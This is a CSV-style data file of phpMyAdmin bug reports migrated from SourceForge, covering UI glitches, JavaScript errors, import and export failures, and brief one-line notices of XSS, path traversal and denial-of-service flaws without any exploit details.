I am running Apache 2.4.9 Win32) OpenSSL 1.0.1g PHP 5.5.11 Database client version libmysql mysqlnd 5.0.11 dev 20120503 PHP extension mysqli Documentation I tested in Windows 8.1 in Chrome 37.0.2062.124 m, Firefox 32, and Internet Explorer 11.0.9600.17278 It s my first bug report so please be tolerant ) I hope I provided clear description and info.
I searched the existing bug reports and i couldn t find anything similar to the bug I found.
Original URL https sourceforge.net p phpmyadmin bugs 4548 Original author picnik Found in version 4.1.12","bug"
"24444","10957","Parser ANSI mode breaks insert feature.
If mysql server is running under ANSI mode, when visiting the insert page, phpMyAdmin will output following message Notice in .
libraries Util.class.php 3730 Undefined index a Backtrace .
libraries Util.class.php 3773 PMA Util getDefaultFunctionForField array, boolean true, ) .
libraries insert edit.lib.php 406 PMA Util getFunctionsForField array, boolean true, ) ...
This is probabily due to PMA SQP analyze ) doesn t accepts ANSI style quote in CREATE TABLE statement, causing the key of create table fields to be empty.
[create table fields] => Array [] => Array [type] => INT ) ) Here s a example SHOW CREATE TABLE output by MySQL under ANSI mode.
CREATE TABLE test a int 11) NOT NULL ) Thank you!
Original URL https sourceforge.net p phpmyadmin bugs 4868 Original author albb0920 Found in version 4.4.3","bug"
"24444","10958","unable to import libreoffice odf files.
Database server Server Localhost via UNIX socket Server type MySQL Server version 5.5.38 0ubuntu0.14.04.1 Ubuntu) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) Web server Apache 2.4.7 Ubuntu) Database client version libmysql 5.5.38 PHP extension mysqli Documentation phpMyAdmin Version information 4.0.10deb1 I don t have the following problem when I run phpmyadmin from XAMPP 1.8.2 6 in Windows, or XAMPP 1.8.304 in xubuntu 64 bit.
When I try to import an .ods file, I get CREATE TABLE IF NOT EXISTS `bpslk txp`.`a bks` `02002001` varchar 10 ) , `02002001` varchar 11 ) , `Connected Discourses of the Buddha` varchar 132 ) , `17` int 3 ) ) DEFAULT CHARACTER SET utf8 COLLATE utf8 general ci; MySQL said Documentation 1060 Duplicate column name 02002001 Yes, I have checked first row contains column names The query should be I think I m only an amateur) CREATE TABLE IF NOT EXISTS `bpslk txp`.`a bks` `dbid` varchar 10 ) , `catno` varchar 11 ) , `title` varchar 132 ) , `qis` int 3 ) ) DEFAULT CHARACTER SET utf8 COLLATE utf8 general ci; This is the first two rows of the .ods spreadsheet.
dbid catno title qis 02002001 02002001 Connected Discourses of the Buddha 17 Original URL https sourceforge.net p phpmyadmin bugs 4550 Original author holly g Found in version 4.0.10","bug"
"24444","10959","Inconsistency in Ignore checkbox in insert page.
Select a table, go to Insert .
By default forms to insert two row are shown.
Before the form for second row, Ignore is written with checkbox preceding it.
Now when you add more rows with the dropdown at the end of the page, the new forms comes with the Ignore followed by the checkbox.
The ordering of checkbox and text Ignore is different.
Also, spacing between two forms are varying.
Original URL https sourceforge.net p phpmyadmin bugs 4870 Original author nisargjhaveri Found in version 4.4.3","bug"
"24444","10960","Wrong test in source code.
Since this commit 4616eb0 , the function PMA getSpecialCharsAndBackupFieldForExistingRow in libraries insert edit.lib.php) contains this code } elseif substr column[ True Type ], 0, 9) == timestamp || column[ True Type ] == datetime || column[ True Type ] == time ) strpos current row[ column[ Field ]], . )
=== TRUE) ) { As you can see, the last condition is strpos [ ]) === true.
This shouldn t be possible strpos will return a number or false.
I think that this condition will never be true.
Original URL https sourceforge.net p phpmyadmin bugs 4551 Original author tithugues Found in version 4.1.7","bug"
"24444","10961","Incorrect routines display for database due to case insensitive checks.
OS ubuntu 13.04 Steps 1.
Create database TEST and test 2.
Add prcedure showtables to TEST database query can be, SHOW TABLES) 3.
In navigation pannel, it displays showtables routine for both TEST and test databases.
And Routines tab of both TEST and test database shows showtables routine.
Execution of this routine of test database display an error.
Expected results showtables routine should be only show under TEST database.
But not under test database.
both in Navigation pannel and Routines tab) MySQL behave case sensitively for case sensitive platforms like linux.
Always adding case sensitive checks for db names comparison will be a solution.
Original URL https sourceforge.net p phpmyadmin bugs 4552 Original author chanaka777 Found in version Latest Git","bug"
"24444","10962","Grid editing timestamp column forces datepicker.
When editing a row through the grid editor, for timestamp columns, I can t directly edit the value, but have to use the datepicker, which is inconvenient when all I want to do is change the year for example.
Editing the row in the standard non grid) editor does let me directly edit timestamp values.
Original URL https sourceforge.net p phpmyadmin bugs 4554 Original author paour1 Found in version 4.2.9","bug"
"24444","10963","Special characters invisible in editor.
In the editing interface, certain special characters that are already stored in the database are not displayed.
For example, the string xe2x80x9cAxc2x81BCxe2x80x9d contains a special character 0x81 between xe2x80x9cAxe2x80x9d and xe2x80x9cBxe2x80x9d, which is hidden in phpMyAdmin, while the `mysql` command line tool displays it as xe2x80x9cA?BCxe2x80x9d.
Suggestions Display an indicator of the hidden character so the user can see it.
Show a warning message that the field contains hidden special characters.
Allow the user to view the field data as BLOB or rawurlencoded.
Original URL https sourceforge.net p phpmyadmin bugs 4555 Original author zweisteinsoft Found in version Latest Git","bug"
"24444","10964","Logging in causes 100 CPU usage.
I just downloaded the latest master branch from github and when I log in, PHP consumes 100 of one CPU on the server for about 2 3 minutes php5 cgi process).
During this time, I see the user interface like normal, but it is unresponsive.
Trying to click on any links brings up the Loading... dialog, but they do not do anything until after the CPU usage goes down.
I m not sure if this has anything to do with running PHP through cgi, but previous versions of phpMyAdmin e.g.
4.2.4) do not have this problem.
Original URL https sourceforge.net p phpmyadmin bugs 4559 Original author mikerobinson Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4559 attachment phpmyadmin cpu.png Attachment http sourceforge.net p phpmyadmin bugs 4559 attachment phpmyadmin cpu1.png","bug"
"24444","10965","PHP error on master branch.
Seen on demo server PHP message PHP Notice Undefined index PMA String in libraries Error.class.php on line 440 Original URL https sourceforge.net p phpmyadmin bugs 4560 Original author nijel Found in version Latest Git","bug"
"24444","10966","XSS in debug SQL output.
With a crafted database or table name it is possible to do an XSS when cfg[ DBG ][ sql ] is enabled.
Original URL https sourceforge.net p phpmyadmin bugs 4562 Original author madhuracj Found in version 4.0.0","bug"
"24444","10967","XSS in monitor query analyzer.
With a crafted database or table name it is possible to do an XSS in server monitor s query analyzing area.
Original URL https sourceforge.net p phpmyadmin bugs 4563 Original author madhuracj Found in version 4.0.0","bug"
"24444","10968","Designer spaces in table name with edit table link generates bad links.
Assume a database with a table name that contains a space, in my case it s TABLE 20 .
Go to Designer, then click the gear icon for that table, which takes you to that table s Structure tab.
The breadcrumb at the top of the screen shows the table name as Table 20 and the SQL query displayed is <pre>SELECT FROM `TABLE 21` WHERE 1< pre> Clicking the Browse tab here results in the error message <pre> 1146 Table test.TABLE 21 doesn t exist< pre> Original URL https sourceforge.net p phpmyadmin bugs 4564 Original author ibennetch Found in version 4.2.0","bug"
"24444","10969","Fresh installation on Debian doesn t work SSL connection error).
What I did I installed phpmyadmin on a Debian server with apt get install phpmyadmin as root) when prompted to choose an http server, I chose lighttpd.
On this box, I had Apache2 previously installed, without SSL set up.
That shouldn t matter at all, as phpmyadmin is supposed to configure lighttpd on its own.
I answered all the other prompts basically chose passwords) then I connected to mysite.com phpmyadmin Expected should enter phpmyadmin Observed it redirects to https mysite.com phpmyadmin so far so good) and then it gives ERR SSL PROTOCOL ERROR I had previously installed phpmyadmin on another server, perhaps two, without issues.
Original URL https sourceforge.net p phpmyadmin bugs 4565 Original author teo8976 Found in version 4.2.10 Attachment http sourceforge.net p phpmyadmin bugs 4565 attachment Screenshot 20from 202014 10 21 2000 3A36 3A47.png","bug"
"24444","10970","Exit fullscreen in Designer does not change the button text.
In designer view in full screen and then exit full screen with esc.
The button text does not change.
Moreover when viewing in full text the icon does not toggle Original URL https sourceforge.net p phpmyadmin bugs 4879 Original author madhuracj Found in version 4.4.0","bug"
"24444","10971","Uninstall didn t correctly remove database.
On a Debian 7 box I installed phpmyadmin with apt get install phpmyadmin I said yes to all the questions whether to autoconfigure, create the database etc I uninstalled with sudo apt get remove phpmyadmin I said yes to the prompt whether to remove the database Then I installed it again apt get install phpmyadmin Expected should be exactly as the first time, as if it had never been installed before.
Phpmyadmin s database, in particular, is supposed to have been removed.
Observed when it comes to creating the database, it says Since you are reconfiguring phpmyadmin, you may also want to reinstall xe2x94x82 xe2x94x82 the database which it uses.
xe2x94x82 xe2x94x82 xe2x94x82 xe2x94x82 If you wish to reinstall the database for phpmyadmin, you should select xe2x94x82 xe2x94x82 this option.
If you do not wish to do so if you are reconfiguring the xe2x94x82 xe2x94x82 package for unrelated reasons), you should not select this option.
xe2x94x82 xe2x94x82 xe2x94x82 xe2x94x82 Reinstall database for phpmyadmin?
Note the Re in Reinstall .
This either means that the uninstall didn t remove it properly, or that something else is wrong Original URL https sourceforge.net p phpmyadmin bugs 4566 Original author teo8976 Found in version 4.2.10","bug"
"24444","10972","debian package is age old.
On a fresh install of Debian 7 I did a fresh install of phpmyadmin via apt get install, and I can t believe I got such an ancient version.
3.4.11.1deb2 deb7u1 For god s sake....
Original URL https sourceforge.net p phpmyadmin bugs 4567 Original author teo8976 Found in version Latest Git","bug"
"24444","10973","jQuery dialogs in Designer are not displayed in fullscreen.
jQuery dialog for opening, editing pages etc.
are not displayed in full screen.
Original URL https sourceforge.net p phpmyadmin bugs 4881 Original author madhuracj Found in version 4.4.0","bug"
"24444","10974","Date displayed incorrectly when charting a timeline.
When displaying a chart from a query, a query with X=date, Y=count shows the date correctly when in Line view.
When switched to Timeline view, the 3 letter abbreviation for the month is incorrect in this case 1 month ahead).
Attached is a zip file with a screenshot and the data used to create the chart.
In the screenshot, the view on the left is correct and the view on the right is incorrect.
Original URL https sourceforge.net p phpmyadmin bugs 4568 Original author gabeguillen Found in version 4.2.9 Attachment http sourceforge.net p phpmyadmin bugs 4568 attachment screenshotanddata.zip","bug"
"24444","10975","Issues with Relation View dropdowns.
There are several issues with the Relation View in PMA 4.2.10.1.
Firstly, when you go there the table comes up as 100 wide which moves the dropdowns waaaay to the right and the Column names site in the middle.
I tried removing `width 100 ` from the CSS but that didn t appear to make a difference.
Secondly, when I go to click on an item from the dropdown, sometimes it doesn t select the one I clicked on.
I noticed that sometimes as I move my mouse down the list the highlighted option often jumps back to the top.
This seems to happen mostly when I type a letter to jump to that letter then try to click an option near there, it select one further up.
This happens in Chrome 38) and not Firefox 33) the other 2 issues here occur in both browsers) Thirdly, when I click save it seems like nothing happens.
I think the Loading banner does appear but only for a fraction of a second so it s easy to miss.
Also, I d expect to go back to the table structure view but it stays on the same page.
n Chrome on Original URL https sourceforge.net p phpmyadmin bugs 4569 Original author svivian Found in version 4.2.10","bug"
"24444","10976","Cannot copy any table from my database.
hey i cannot copy any table within my database.
if i try it by using the operations button and then just want to copy my database with another name, a dialog apears which tells me, that it worked.
But my tableoverview doenst shoe me the ne table.. and even if i choose the option switch to created database im taken to it.
but when i click on the tablename on top of the screen there s a dialog with table xy doesnt exist please help me Original URL https sourceforge.net p phpmyadmin bugs 4570 Original author akkulader Found in version 3.3.7","bug"
"24444","10977","Database Privileges link does not work.
Original URL https sourceforge.net p phpmyadmin bugs 4571 Original author lem9 Found in version 4.2.10","bug"
"24444","10978","Incorrect value of session variable.
Hi, When we are tried to login to phpmyadmin, got following error Error during session start; please check your PHP and or webserver log file and configure your PHP installation properly.
Also ensure that cookies are enabled in your browser.
After checking found that ut is using incorrect value of session variable i.e.
var lib php5 but it must use following var lib php5 sessions.
We are currently fixing it by using following commands chmod a t w var lib php5 chmod go r var lib php5 We know its not proper way to change session variables.
Original URL https sourceforge.net p phpmyadmin bugs 4573 Original author gau1991 Found in version Latest Git","bug"
"24444","10979","Blank white page when JavaScript disabled.
If the browser has JavaScript disabled when opening the start URL the screen is blank white without any text.
Example http demo.phpmyadmin.net master See attached screenshots of Mozilla Firefox and Internet Explorer.
Expected result The text of the existing noscript tag should be shown Javascript must be enabled past this point!
It looks as if this display none causes this issue <style id= cfs style >html{display none;}< style> Original URL https sourceforge.net p phpmyadmin bugs 4574 Original author julianladisch Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4574 attachment no javascript firefox.png","bug"
"24444","10980","Clicking on external links in advisor rules give JS error.
Original URL https sourceforge.net p phpmyadmin bugs 4886 Original author madhuracj Found in version 4.4.0","bug"
"24444","10981","Creating auto increment on unique index fails.
Description I created a new table with UI in phpmyadmin which in turn generated following sql query.
CREATE TABLE `test` `id` int 11) NOT NULL, `name` varchar 30) NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Now when i try to add a new `int` column with the UI, i set the index to unique and auto increment checked, it generated error Multiple primary key defined which is not in my case) with following sql query ALTER TABLE `test` ADD `extra` INT NOT NULL AUTO INCREMENT , ADD PRIMARY KEY `extra`) , ADD UNIQUE `extra`) ; When i rectified the query by removing ADD PRIMARY KEY `extra`) , it works perfect.
I think the query generation in this case should be reconsidered Original URL https sourceforge.net p phpmyadmin bugs 4575 Original author shadowisbrawler Found in version 4.1.12","bug"
"24444","10982","Name column excluded from quick filters in central columns.
Original URL https sourceforge.net p phpmyadmin bugs 4887 Original author madhuracj Found in version Latest Git","bug"
"24444","10983","Filter in central columns does not work in other languages.
This is because the list of column names is hard code in English Original URL https sourceforge.net p phpmyadmin bugs 4888 Original author madhuracj Found in version 4.4.0","bug"
"24444","10984","Issue with long comments on table columns.
Hello, I had a small issue with long comments on table columns where I ended up seeing this http pbrd.co 1q7vAXj see screenshot).
If you could apply following style for the comment span, it would fix the problem.
Fixed comment span block width should be controlled using JavaScript and equal to the width of current column.
Please see recommended style to be used span.tblcomment { o text overflow ellipsis; Opera text overflow ellipsis; IE, Safari WebKit) overflow hidden; don t show excess chars white space nowrap; force single line width 300px; fixed width should be JavaScript controlled } Here is a result after manually applying the style above) http pbrd.co 1q7CPi9 Looking forward for this to be included in the phpMyAdmin.
Thanks.
Best regards, Linas Paxc5xa1viestis Original URL https sourceforge.net p phpmyadmin bugs 4576 Original author crylar Found in version 4.2.10","bug"
"24444","10985","Multi row actions cause full page reloads.
Multi row actions such as edit, delete, export in table browse page causes full page relaods including the navigation.
Original URL https sourceforge.net p phpmyadmin bugs 4577 Original author madhuracj Found in version 4.2.0","bug"
"24444","10986","XSS vulnerability in zoom search page.
With a crafted enum value it is possible to trigger an XSS in zoom search page Original URL https sourceforge.net p phpmyadmin bugs 4579 Original author madhuracj Found in version 4.0.0","bug"
"24444","10987","Upload progress bar.
I am not able to see the progress bar, either via the APC or the PECL upload progress component.
The only place I see upload progress status is with the new drag and drop import 4.3).
In my tests, there is a problem when import status.php tries to session start ).
I believe that the current session is locked, so import status.php stalls and cannot report anything until the file is completely uploaded.
Original URL https sourceforge.net p phpmyadmin bugs 4580 Original author lem9 Found in version 4.2.11","bug"
"24444","10988","Debug SQL works only for the first page.
Developer option Debug SQL works only for the first page as executed queries are sent to the front end using the footer which is loaded only in the first page.
Original URL https sourceforge.net p phpmyadmin bugs 4582 Original author madhuracj Found in version 4.0.0","bug"
"24444","10989","Edit dialog for routines is too long for smaller displays.
Edit dialog of a function or procedure with a couple of input variables may be longer than the screen and the GO button is not accessible to submit the changes.
Original URL https sourceforge.net p phpmyadmin bugs 4584 Original author madhuracj Found in version 4.0.0","bug"
"24444","10990","Multi query results not shown.
Only the results of the last query of multiple queries is shown.
Original URL https sourceforge.net p phpmyadmin bugs 4585 Original author madhuracj Found in version 4.2.11","bug"
"24444","10991","Javascript error after moving a column.
In Table > Structure > Move columns I make a move and click on Go.
After the move, the top list of columns has to be updated, but when calling fieldsForm ul.table structure actions ).menuResizer PMA tbl structure menu resizer callback); to resize the table actions menu, an error happens in Firefox 33 HierarchyRequestError Node cannot be inserted at the specified point in the hierarchy Moreover, the error reporting for this one does not work not sure if this is related to this bug).
Original URL https sourceforge.net p phpmyadmin bugs 4586 Original author lem9 Found in version 4.2.11","bug"
"24444","10992","Moving, renaming, dropping actions in table operations page results in token mismatch.
Original URL https sourceforge.net p phpmyadmin bugs 4588 Original author madhuracj Found in version Latest Git","bug"
"24444","10993","Spinner in navigation running forever.
Right click on a database in the navigation and open in a new tab.
You ll see an annoying spinner running until you reload the navigation Original URL https sourceforge.net p phpmyadmin bugs 4591 Original author madhuracj Found in version Latest Git","bug"
"24444","10994","Manual SELECT doesn t change active table.
Originally brought up in https stackoverflow.com questions 24551187 executing select query is not switching environment to new table When changing tables through manually executed SQL, we don t behave consistently.
For instance, in the sakila database, click to browse actors .
Then use the Inline edit button to change the SQL to <tt>SELECT FROM `category`< tt>.
The expected result would be to have the active table changed to category and the navigation pane does change the highlighted table, but the active table for tabs and the breadcrumb list stay with actors .
Additionally, entering a query directly to the SQL tab does not change the navigation pane or breadcrumb list.
However, changing databases this way does work as expected clicking the SQL tab and typing <tt>USE `employees`;< tt> has the desired effect).
Is this possible to improve?
Original URL https sourceforge.net p phpmyadmin bugs 4593 Original author ibennetch Found in version 4.3.0","bug"
"24444","10995","Path Traversal in File Inclusion of GIS Factory.
Originally reported by Johannes.
With a crafted GIS type name it is possible to do a file inclusion Original URL https sourceforge.net p phpmyadmin bugs 4594 Original author madhuracj Found in version 4.0.0","bug"
"24444","10996","Path Traversal can lead to leakage of line count.
Originally reported by Johannes.
Due to a vulnerability in error reporting feature one can derive the line count of an arbitrary file Original URL https sourceforge.net p phpmyadmin bugs 4595 Original author madhuracj Found in version 4.1.0","bug"
"24444","10997","JS error after selecting a field and press Enter.
A JS error is thrown after going to structure page of a table reloading the page selecting a field pressing Enter Error is here around js ajax.js 372) AJAX.cache.add data.
selflink, data.
scripts, data.
menuHash, data.
params, AJAX.source.attr rel ) ); AJAX.source is null, so call to attr fails.
Original URL https sourceforge.net p phpmyadmin bugs 4898 Original author tithugues Found in version 4.4.0","bug"
"24444","10998","XSS through exception stack.
Originally reported by Johannes.
With a crefted file name it is possible to trigger an in the error reporting functionality.
Original URL https sourceforge.net p phpmyadmin bugs 4596 Original author madhuracj Found in version 4.1.0","bug"
"24444","10999","XSS through pma fontsize cookie.
Originally reported by Johannes.
With the forgery of a pma fontsize cookie it is possible to trigger an XSS Original URL https sourceforge.net p phpmyadmin bugs 4597 Original author madhuracj Found in version 4.0.0","bug"
"24444","11000","Input field unnecessarily selected on focus.
phpMyAdmin 4.2.10.1, Firefox 31.2.0, Gnome 3.12.0 on Debian Linux jessie testing ) I edit Table options in Operations .
I type a comment in Table comments text input field.
When I switch to an other window, phpMyAdmin makes the entire field Table comments selected.
The real trouble is that when I use Super Space Gnome shortcut to switch keyboard language, a new tiny window appears and is focused while I hold the key.
As the result after switching keyboard language, the Table comments text input is selected and typing the next char erases all I typed before.
So, after I switch keyboard language, what I type after this erases all what I typed before.
It is a bug.
Original URL https sourceforge.net p phpmyadmin bugs 4599 Original author porton Found in version 3.3.7","bug"
"24444","11001","Browse Table Vertical display is broken.
Using this configuration `` cfg[ DefaultDisplay ] = vertical ;`` The browse table view as well inline editing with this configuration does not work.
Original URL https sourceforge.net p phpmyadmin bugs 4601 Original author chirayu45 Found in version 4.2.11","bug"
"24444","11002","Exporting selected rows export all rows of the query.
Exporting selected rows from a query exports all rows for that query Original URL https sourceforge.net p phpmyadmin bugs 4602 Original author madhuracj Found in version 4.2.0","bug"
"24444","11003","Error processing request.
From https stackoverflow.com questions 29292795 error in processing request 200 phpmyadmin I keep on getting this error message error on processing request error code 200 error text OK when selecting from a database in phpmyadmin.
I re installed and restarted the server and phpmyadmin but still facing same issue.
This is my log file of the error message pma version 4.3.7 , browser name CHROME , browser version 41.0.2272.101 , user os Win , server software Apache 2.4.10 Win32) OpenSSL 1.0.1i PHP 5.6.3 , user agent string Mozilla 5.0 Windows NT 6.3; WOW64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 41.0.2272.101 Safari 537.36 , locale en , configuration storage enabled , php version 5.6.3 , exception type js , exception { mode onerror , message Uncaught SyntaxError Unexpected identifier , stack [ { line 390, func ?
, context [ } , , SCROLLBARS , , Prepare DOM reads needed to update HTTP 1.1 200 OK\r , Date Mon, 23 Mar 2015 15 04 46 GMT\r , Server Apache 2.4.10 Win32) OpenSSL 1.0.1i PHP 5.6.3\r , X Powered By PHP 5.6.3\r , Expires Mon, 23 Mar 2015 16 04 46 GMT\r , Keep Alive timeout=5, max=100\r , Connection Keep Alive\r ], filename codemirror lib codemirror.js } ], useragent Mozilla 5.0 Windows NT 6.3; WOW64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 41.0.2272.101 Safari 537.36 , name SyntaxError , uri index.php?
}, script name index.php , microhistory { pages [ { hash index.php?db= table= server=1 target= token=814184a233707cc347e32deb678d6da0 } ], current index 1 } } I am also facing some issues with Jquery and JavaScript which i believe is because of this error.
Original URL https sourceforge.net p phpmyadmin bugs 4901 Original author ibennetch Found in version 4.3.7","bug"
"24444","11004","Designer Loading does not work.
On an existing table I did the following after selecting the database 1.
Go to the Designer.
2.
Select the Save Page and wrote a page name.
3.
Press the Designer button again, the page is now empty.
4.
Select Open page and the name of the page I saved.
5.
The title still says Untitled and nothing happens.
I am not sure what other information is needed.
This bug might be similar to bug [ 4792] https sourceforge.net p phpmyadmin bugs 4792 ).
But that one is about something got Undefined when loading while this bug is about being unable to load at all.
Original URL https sourceforge.net p phpmyadmin bugs 4902 Original author tomelssjo Found in version Latest Git","bug"
"24444","11005","Field disabled when internal relations used.
Tested in PMA 4.2.11 and 4.4.0 dev.
When a field has PMA s internal relations set up on it, it s not possible to edit the field name or type.
When I click the edit icon from the Structure view of a table, the name and type fields come up disabled in grey).
Took me ages to figure out why on earth they would be disabled.
Original URL https sourceforge.net p phpmyadmin bugs 4603 Original author svivian Found in version 4.2.11","bug"
"24444","11006","Query history not being deleted.
I just looked at my phpmyadmin.pma history table, and found it had over 4500 entries!
According to the config, the default number of entries to be kept is 25, but even when I explicitly set ` cfg[ QueryHistoryMax ]`, the number of rows there doesn t shrink.
I tried emptying the table but after a short while the number of queries stored goes back above the maximum.
Original URL https sourceforge.net p phpmyadmin bugs 4604 Original author svivian Found in version 4.2.12","bug"
"24444","11007","Tracking report export as SQL dump does not work.
Exporting a tracking report with SQL dump file download) option exports a file with HTML rather than SQL Original URL https sourceforge.net p phpmyadmin bugs 4606 Original author madhuracj Found in version 4.2.12","bug"
"24444","11008","Syntax Error during db copy operation.
On PhpMyAdmin 4.2.12, Mysql 5.5.38 When using the Copy database to tool under Operations db operations), and the source database contains a table that conflicts with a mysql keyword, I receive a syntax error during the automated process For example, if my source database contains a table order I will get this query and erro message ALTER TABLE order; 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near order at line 1 This appears to be one of the last steps in the copy database process, since all tables appear to have otherwise copied over.
Original URL https sourceforge.net p phpmyadmin bugs 4607 Original author dtyler7 Found in version 3.3.7","bug"
"24444","11009","Show all checkbox label is not clickable.
In Browse mode, the checkbox label for the Show all feature is not clickable.
You have to click the checkbox itself to activate the feature.
Original URL https sourceforge.net p phpmyadmin bugs 4609 Original author zweisteinsoft Found in version 4.3.0","bug"
"24444","11010","JS error reporting Hash fragment is reset.
The JS error reporting notification bar closing link points to href= .
Clicking navigates to the target, so the hash history is overwritten.
Original URL https sourceforge.net p phpmyadmin bugs 4610 Original author zweisteinsoft Found in version 4.3.0","bug"
"24444","11011","DOS attack with long passwords.
Originally reported by Javier Nieto.
An attacker can DOS a phpMyAdmin installation with enough looping using long passwords Original URL https sourceforge.net p phpmyadmin bugs 4611 Original author madhuracj Found in version 4.2.12","bug"
"24444","11012","XSS vulnerability in redirection mechanism.
Originally discovered by Manuel Fernxc3xa1ndez.
With a crafted url an attacker can trigger an XSS in the redirection mechanism Original URL https sourceforge.net p phpmyadmin bugs 4612 Original author madhuracj Found in version 4.2.12","bug"
"24444","11013","HHVM method ob gzhandler not found.
On HHVM, At phpMyAdmin login page or any other page we get following error Warning in .
libraries OutputBuffering.class.php 88 Invalid argument function method ob gzhandler not found Backtrace .
libraries Response.class.php 100 PMA OutputBuffering >start ) .
libraries Response.class.php 131 PMA Response > construct ) .
libraries plugins auth AuthenticationCookie.class.php 62 PMA Response getInstance ) .
libraries common.inc.php 871 AuthenticationCookie >auth ) .
index.php 12 include .
libraries common.inc.php) According to HHVM docs, the given method is not supported in it.
http docs.hhvm.com manual en function.ob gzhandler.php Though this does not affects login procedure and we can login to phpMyAdmin successfully.
Original URL https sourceforge.net p phpmyadmin bugs 4613 Original author chirayu45 Found in version 4.3.0 Attachment http sourceforge.net p phpmyadmin bugs 4613 attachment hhvm login page.png","bug"
"24444","11014","Separator between Show All and Number of rows disappears.
Separator between Show All and Number of rows disappears when number of rows displayed is more then rows in table and Show All is disabled.
Original URL https sourceforge.net p phpmyadmin bugs 4614 Original author nisargjhaveri Found in version Latest Git","bug"
"24444","11015","SQL highlighting in process list breaks on auto refresh.
Fixed with https github.com phpmyadmin phpmyadmin commit 5d0a2298e242d03dec663862207bb6959087584a Original URL https sourceforge.net p phpmyadmin bugs 4615 Original author madhuracj Found in version 4.3.0","bug"
"24444","11016","Warnings in db structure print view page.
Warning in .\libraries\url generating.lib.php 196 Illegal string offset token Backtrace .\db printview.php 24 PMA URL getCommon string sakila ) Warning in .\libraries\url generating.lib.php 203 http build query ) Parameter 1 expected to be Array or Object.
Incorrect value given Backtrace .\libraries\url generating.lib.php 203 http build query string 6akila , string , string , ) .\db printview.php 24 PMA URL getCommon string sakila ) Original URL https sourceforge.net p phpmyadmin bugs 4616 Original author madhuracj Found in version 4.3.0","bug"
"24444","11017","UI issues with sortable tables.
Clicking on headers in central column list allow sorting the list.
However, the following issues are there.
On hover the icon is changed to move Text in the headers are not links, so the fact that they can be clicked to order is not apparent.
Current sort order ASC, DESC) is not indicated I think a it would be best to follow similar UI parent employed by result display page Original URL https sourceforge.net p phpmyadmin bugs 4617 Original author madhuracj Found in version 4.3.0","bug"
"24444","11018","Lock page icon is not shown after fresh reload.
If the page is freshly reloaded, the lock page icon is not shown on any changes on the page.
However, if you come to the same page without fresh load i.e.
AJAX page load), it works for the same changes.
Reproducible at least on insert record and create table pages.
On both latest chrome and Firefox on Ubuntu.
Original URL https sourceforge.net p phpmyadmin bugs 4911 Original author nisargjhaveri Found in version 4.4.7","bug"
"24444","11019","Page scrolls while GIS visualization is zoomed in out with mousewheel.
Original URL https sourceforge.net p phpmyadmin bugs 4618 Original author madhuracj Found in version 4.3.0","bug"
"24444","11020","SELECT LENGTH `field`) FROM `table` does not sort.
This is related to [ 4030].
SELECT LENGTH `field`) FROM `table` properly shows the list.
But I am not able to sort the list.
Clicking on the column LENGTH `field`) shows the Loading... message and after a few seconds nothing changed.
I am not able to sort by that column.
Original URL https sourceforge.net p phpmyadmin bugs 4619 Original author ci dev Found in version 4.3.0","bug"
"24444","11021","Undefined index while adding to the central columns list.
Original URL https sourceforge.net p phpmyadmin bugs 4620 Original author lem9 Found in version Latest Git","bug"
"24444","11022","Cannot remove table ordering on a Mac.
If you sort a table by a column, you cannot remove that sorting on a Mac.
Ctrl Click opens the context menu instead.
The only way is to delete entries from phpmyadmin.pma table uiprefs, then log out and log back in again.
Tested on PMA 4.3.0 in both Chrome and Firefox Mac OSX Yosemite 10.10.1) with the same result.
Original URL https sourceforge.net p phpmyadmin bugs 4622 Original author svivian Found in version 4.3.2","bug"
"24444","11023","Getting an uncaught type error on Google Chrome Beta.
Hello, I m getting an Uncaught TypeError Object <Object> has no method menuResizer on my Google Chrome Beta.
I can t can t right click any links since the loading indicator always shows up.
I ve tried opening phpMyAdmin using Firefox Beta and Internet Explorer 11 and it works just fine.
Using Google Chrome Beta 33.0.1750.29 beta m Original URL https sourceforge.net p phpmyadmin bugs 4624 Original author kotaro535 Found in version 3.3.7 Attachment http sourceforge.net p phpmyadmin bugs 4624 attachment phpmyadmin.jpg","bug"
"24444","11024","Insufficient space to save the file on export SQL to file on server.
scenario.1 pma > database > export > save on server format JSON > go expected result successful export to file on server actual result successful export to file on server OK scenario.2 pma > database > export > save to file download as file) format SQL > go expected result successful export with file download actual result successful export with file download OK scenario.3 pma > database > export > save on server format SQL > go expected result successful export to file on server actual result export fails with message Insufficient space to save the file .sql specified export target file contains tables structure but has no table data.
pma version 4.3.0 server software srv1 ubuntu server 14.04 64bit, nginx 1.4.6, php 5.5.9 1ubuntu4.5 fpm fcgi) srv2 ubuntu server 14.04 64bit, apache 2.4.7, php 5.5.9 1ubuntu4.5 mod php) Original URL https sourceforge.net p phpmyadmin bugs 4625 Original author ganzal Found in version 4.3.0","bug"
"24444","11025","Date field popup dialog position bug.
Hi, I found small bug in UI, see attached screenshots 1. editing date field with dialog fully on a screen, looks OK, I can see NULL check box; 2. editing another date field, but here dialog partially out of screen and it shown over check box; 3. of course I can press cancel button to see check box, but it is annoying to do that many times.
Original URL https sourceforge.net p phpmyadmin bugs 4918 Original author jay04653 Found in version 4.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4918 attachment screen1.png Attachment http sourceforge.net p phpmyadmin bugs 4918 attachment screen2.png Attachment http sourceforge.net p phpmyadmin bugs 4918 attachment screen3.png","bug"
"24444","11026","Ctrl click on a column not is sort triggers a server call to erroneous url.
Original URL https sourceforge.net p phpmyadmin bugs 4626 Original author madhuracj Found in version 4.3.0","bug"
"24444","11027","[4.3.0deb0.3] file get contents examples create tables.sql) failed to open stream after update.
Using the following repo deb http ppa.launchpad.net tuxpoldo phpmyadmin ubuntu utopic main I apt get updated ed and got 4.3.0deb0.3, but I also got an error that appears every time I switch databases.
Warning in .
libraries relation.lib.php 1815 file get contents examples create tables.sql) failed to open stream No such file or directory Backtrace .
libraries relation.lib.php 1815 file get contents string examples create tables.sql ) .
libraries core.lib.php 999 PMA getDefaultPMATableNames ) .
libraries common.inc.php 1153 PMA checkAndFixPMATablesInCurrentDb ) .
db structure.php 12 require once .
